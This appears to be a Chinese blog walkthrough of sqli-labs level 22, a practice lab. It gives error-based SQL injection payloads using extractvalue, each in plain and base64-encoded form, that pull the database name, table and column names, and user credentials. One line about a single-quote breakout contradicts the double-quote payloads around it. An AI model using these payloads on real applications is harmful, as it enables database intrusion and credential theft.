这里来到了第一阶段的最后一关:22 关
![19f5eec4623ddea93dcc607a1366319.png](http://112.74.54.253/usr/uploads/2020/06/3088359061.png)
其实跟 21 关一样,只不过变成了双引号 " 而已,直接上菜吧o( ̄▽ ̄)ブ
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSM=
uname=admin" and extractvalue(1,concat(0x7e,(select database()),0x7e))#
怎么猜单引号加括号,这里当你构造好 payload post 以后,会出现 BUG OFF…但是加了’)#就没有,这就才出来了。接下来直接上 payload:
–查表
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGxpbWl0IDAsMSksMHg3ZSkpIw==
uname=admin" and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))#
–查列
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGNvbHVtbl9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgYW5kIHRhYmxlX25hbWUgPSAndXNlcnMnIGxpbWl0IDAsMSksMHg3ZSkpIw==
uname=admin" and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1),0x7e))#
–查用户名
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHVzZXJuYW1lIGZyb20gdXNlcnMgbGltaXQgMCwxKSwweDdlKSkj
uname=admin" and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))#
–查密码
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHBhc3N3b3JkIGZyb20gdXNlcnMgbGltaXQgMCwxKSwweDdlKSkj
uname=admin" and extractvalue(1,concat(0x7e,(select password from users limit 0,1),0x7e))#
![a1fc5991f37a9dfb7a7b0a6bd93c68c.png](http://112.74.54.253/usr/uploads/2020/06/2640782440.png)
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)